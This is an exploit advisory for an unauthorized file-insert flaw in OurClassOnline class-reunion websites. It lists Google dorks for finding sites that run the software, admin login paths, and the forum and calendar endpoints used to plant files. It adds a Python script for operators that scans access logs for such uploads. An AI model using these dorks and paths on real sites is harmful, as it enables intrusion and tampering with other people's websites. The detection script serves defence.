Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability

Author: KingSkrupellos, Published: 16-11-2018
# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Admin and Moderator Panel Login Paths :

/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4

#################################################################################################

# Exploit :

/forum_topic_create.php?forumid=1

/files_forum/[RANDOM-NUMBER]_[YOUR-FILENAME-HERE].txt

/calendar_add.php

/calendar_event.php?eventid=[RANDOM-NUMBER]
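
For site operators reviewing their own logs, the following added example (not part of the original advisory or the vendor's code) flags clients that POST to the creation endpoints listed above and then fetch a file under /files_forum/, so the entries can be checked against known member sessions. It assumes Apache/Nginx Combined Log Format; the function name and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Paths named in the advisory: content-creation endpoints and the upload directory.
CREATE_PATHS = ("/forum_topic_create.php", "/calendar_add.php")
UPLOAD_RE = re.compile(r"^/files_forum/(\d+)_([^/?]+)$")

# Combined Log Format (assumed): ip - user [time] "METHOD target proto" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [13/Nov/2018:10:00:01 +0000] "GET /forum_topic_create.php?forumid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Nov/2018:10:00:09 +0000] "POST /forum_topic_create.php?forumid=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Nov/2018:10:00:12 +0000] "GET /files_forum/48213_note.txt HTTP/1.1" 200 42 "-" "Mozilla/5.0"
203.0.113.20 - - [13/Nov/2018:10:05:00 +0000] "GET /files_forum/1001_minutes.txt HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.44 - - [13/Nov/2018:10:07:30 +0000] "POST /calendar_add.php HTTP/1.1" 200 310 "-" "curl/7.61.0"
"""

def find_suspect_writes(log_text):
    """Map each client IP that POSTed to a creation endpoint to its writes and
    to any /files_forum/ files it requested after its first such POST."""
    report = defaultdict(lambda: {"writes": [], "uploads_fetched": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed or non-CLF lines
        ip, when, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # drop the query string before matching
        if method == "POST" and path in CREATE_PATHS and status[0] in "23":
            report[ip]["writes"].append((when, path))
        elif UPLOAD_RE.match(path) and ip in report:
            report[ip]["uploads_fetched"].append(path)
    return dict(report)

if __name__ == "__main__":
    for ip, info in find_suspect_writes(SAMPLE_LOG).items():
        print(ip, info["writes"], info["uploads_fetched"])
```

Access logs alone do not show whether a request carried a valid member session, so each flagged client still has to be matched against the application's own login records.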

#################################################################################################

# Example Vulnerable Sites =>

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################